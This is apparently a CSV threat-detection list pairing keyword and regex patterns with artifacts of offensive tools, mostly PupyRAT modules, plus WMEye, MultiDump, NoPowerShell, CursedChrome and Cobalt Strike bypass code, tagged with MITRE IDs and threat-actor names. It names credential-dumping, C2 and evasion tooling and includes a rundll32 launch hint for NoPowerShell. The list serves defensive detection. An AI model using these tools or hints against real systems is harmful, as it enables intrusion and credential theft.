"*public class WmEye*",".{0,1000}public\sclass\sWmEye.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","55798"
"*Public\dcinst.exe*",".{0,1000}Public\\dcinst\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","55799"
"*Public\lsass.dmp*",".{0,1000}Public\\lsass\.dmp.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","55800"
"*PublicKeyToken=8337224c9ad9e356*",".{0,1000}PublicKeyToken\=8337224c9ad9e356.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","55801"
"*publisher.publish(`TOBROWSER_*",".{0,1000}publisher\.publish\(\`TOBROWSER_.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","55802"
"*pupwinutils.shellcode*",".{0,1000}pupwinutils\.shellcode.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55809"
"*pupy*/checkvm.py*",".{0,1000}pupy.{0,1000}\/checkvm\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55810"
"*pupy/external/Inveigh*",".{0,1000}pupy\/external\/Inveigh.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55811"
"*pupy/external/LaZagne*",".{0,1000}pupy\/external\/LaZagne.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55812"
"*pupy/external/linux-exploit-suggester*",".{0,1000}pupy\/external\/linux\-exploit\-suggester.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","#linux","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55813"
"*pupy/external/mimipy*",".{0,1000}pupy\/external\/mimipy.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55814"
"*pupy/external/pyopus*",".{0,1000}pupy\/external\/pyopus.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55815"
"*pupy/external/pywerview*",".{0,1000}pupy\/external\/pywerview.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55816"
"*pupy/external/winpty*",".{0,1000}pupy\/external\/winpty.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55817"
"*pupy/external/WinPwnage*",".{0,1000}pupy\/external\/WinPwnage.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55818"
"*pupy/payload_*",".{0,1000}pupy\/payload_.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55819"
"*pupy/pupy/external/BeRoot*",".{0,1000}pupy\/pupy\/external\/BeRoot.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55820"
"*PupyCmdLoop*",".{0,1000}PupyCmdLoop.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55821"
"*PupyCredentials.py*",".{0,1000}PupyCredentials\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55822"
"*PupyDnsCnc.py*",".{0,1000}PupyDnsCnc\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55823"
"*PupyDnsCommandServerHandler*",".{0,1000}PupyDnsCommandServerHandler.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55824"
"*pupygen.py *",".{0,1000}pupygen\.py\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55825"
"*PupyKCPSocketStream*",".{0,1000}PupyKCPSocketStream.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55826"
"*pupylib.payloads.ps1*",".{0,1000}pupylib\.payloads\.ps1.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55827"
"*PupyLoaderTemplate.*",".{0,1000}PupyLoaderTemplate\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55828"
"*PupyOffloadDNS*",".{0,1000}PupyOffloadDNS.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55829"
"*PupyOffloadSocket*",".{0,1000}PupyOffloadSocket.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55830"
"*PupySocketStream.py*",".{0,1000}PupySocketStream\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55831"
"*PupyVirtualStream.py*",".{0,1000}PupyVirtualStream\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55832"
"*pureqh/bypassAV*",".{0,1000}pureqh\/bypassAV.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pureqh/bypassAV","1","1","N/A","N/A","10","10","455","98","2021-05-18T05:03:03Z","2021-02-25T05:26:11Z","55833"
"*purevpn_cred_collector.*",".{0,1000}purevpn_cred_collector\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55834"
"*purplepanda.py*",".{0,1000}purplepanda\.py.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","1","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","55835"
